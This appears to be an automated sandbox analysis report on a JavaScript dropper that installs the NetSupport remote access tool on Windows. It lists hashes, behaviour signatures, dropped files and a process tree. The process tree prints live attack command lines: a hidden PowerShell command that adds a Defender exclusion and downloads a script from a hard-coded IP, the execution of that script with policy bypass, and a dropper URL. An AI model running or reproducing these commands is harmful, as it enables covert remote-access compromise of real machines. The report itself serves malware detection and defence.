Analysis

  • max time kernel
    143s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/05/2023, 08:56

General

  • Target

    02303299.js

  • Size

    1KB

  • MD5

    c80a26b806b3486c6157d8904c2e13e7

  • SHA1

    54d8be3eb5bdd4a788dcef3265cab6c314be1ccc

  • SHA256

    64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81

  • SHA512

    4b7c084016a3fb20ae5b95c51c0459c327b163f0d7d942d931182009cd4bde50f24a867d7e60b62a6801189bcb4bba425b474e85b009ccb27e88bc3af6f59200

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://golden-scalen.com/ngg_cl.zip

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\02303299.js
    1⤵
    • Blocklisted process makes network request
    PID:4280
  • C:\Windows\system32\cmd.exe
    cmd /c start /MIN C:\ProgramData\BLD.bat
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:5020
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3540
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -nop -w hidden -ep bypass C:\ProgramData\archive.ps1
        3⤵
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4976
        • C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe
          "C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:4768
  • C:\Windows\system32\cmd.exe
    cmd /c start C:\ProgramData\zayavka2.txt
    1⤵
    • Process spawned unexpected child process
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:936
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:3920

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\BLD.bat

          Filesize

          322B

          MD5

          018d63793042f588a85968475d98decf

          SHA1

          2c4f9a0bd490c2b53976adf08805dcc92fac349a

          SHA256

          afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0

          SHA512

          ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a

        • C:\ProgramData\archive.ps1

          Filesize

          905B

          MD5

          50dc5faa02227c0aefa8b54c8e5b2b0d

          SHA1

          27fe39b6b053685d4c781a7fa809840ebaab15d7

          SHA256

          aafc02e9f9c6ce1e9ff7aff753e5656d3d26041e06b78a9fd60ca6fe5127e09b

          SHA512

          5bb8701fa6b026e99a8f269b89660ee8abba7c88a654f756d455a13e418a29c75e1742278046985bcc599151f0838591ef58ae8f742016153e43c8c5a78da442

        • C:\ProgramData\zayavka2.txt

          Filesize

          1KB

          MD5

          6cea5f86700d707b53b8f4a67d1ccf29

          SHA1

          37e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54

          SHA256

          6e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70

          SHA512

          d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          02a1a26525c65a359d41483180eaa6f7

          SHA1

          c0e2578b92d20e925c1c87016d1a9fccee1ec56f

          SHA256

          d0ec351493bdbc6cb94990b162bb8be5b0217277cc55ae12aa3c7ea704cdbc6e

          SHA512

          d3271137241553f8316fcfc94dcf88c2887ee7bb0babddb4c1666fb5ae821a28425400299281422a4ebeb1f4c7369443b839d10f182279504bbba5f2f1cd94c2

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xstt41or.rrw.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\HTCTL32.DLL

          Filesize

          320KB

          MD5

          2d3b207c8a48148296156e5725426c7f

          SHA1

          ad464eb7cf5c19c8a443ab5b590440b32dbc618f

          SHA256

          edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

          SHA512

          55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

        • C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\PCICHEK.DLL

          Filesize

          18KB

          MD5

          a0b9388c5f18e27266a31f8c5765b263

          SHA1

          906f7e94f841d464d4da144f7c858fa2160e36db

          SHA256

          313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

          SHA512

          6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

        • C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\PCICL32.DLL

          Filesize

          3.6MB

          MD5

          00587238d16012152c2e951a087f2cc9

          SHA1

          c4e27a43075ce993ff6bb033360af386b2fc58ff

          SHA256

          63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

          SHA512

          637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

        • C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

          Filesize

          101KB

          MD5

          c4f1b50e3111d29774f7525039ff7086

          SHA1

          57539c95cba0986ec8df0fcdea433e7c71b724c6

          SHA256

          18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

          SHA512

          005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

        • C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe

          Filesize

          101KB

          MD5

          c4f1b50e3111d29774f7525039ff7086

          SHA1

          57539c95cba0986ec8df0fcdea433e7c71b724c6

          SHA256

          18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

          SHA512

          005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

        • C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\msvcr100.dll

          Filesize

          755KB

          MD5

          0e37fbfa79d349d672456923ec5fbbe3

          SHA1

          4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

          SHA256

          8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

          SHA512

          2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

        • C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\msvcr100.dll

          Filesize

          755KB

          MD5

          0e37fbfa79d349d672456923ec5fbbe3

          SHA1

          4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

          SHA256

          8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

          SHA512

          2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

        • C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\pcicapi.dll

          Filesize

          32KB

          MD5

          dcde2248d19c778a41aa165866dd52d0

          SHA1

          7ec84be84fe23f0b0093b647538737e1f19ebb03

          SHA256

          9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

          SHA512

          c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

        • memory/3844-155-0x0000023223260000-0x0000023223270000-memory.dmp

          Filesize

          64KB

        • memory/3844-146-0x0000023223260000-0x0000023223270000-memory.dmp

          Filesize

          64KB

        • memory/3844-151-0x0000023223260000-0x0000023223270000-memory.dmp

          Filesize

          64KB

        • memory/3844-211-0x0000023223260000-0x0000023223270000-memory.dmp

          Filesize

          64KB

        • memory/3844-145-0x00000232237A0000-0x00000232237C2000-memory.dmp

          Filesize

          136KB

        • memory/4768-220-0x00000000749C0000-0x00000000749CE000-memory.dmp

          Filesize

          56KB

        • memory/4976-171-0x0000020DF9AF0000-0x0000020DF9B02000-memory.dmp

          Filesize

          72KB

        • memory/4976-170-0x0000020DF9AB0000-0x0000020DF9AC4000-memory.dmp

          Filesize

          80KB

        • memory/4976-169-0x0000020DF8CF0000-0x0000020DF8D00000-memory.dmp

          Filesize

          64KB

        • memory/4976-168-0x0000020DF8C70000-0x0000020DF8C7A000-memory.dmp

          Filesize

          40KB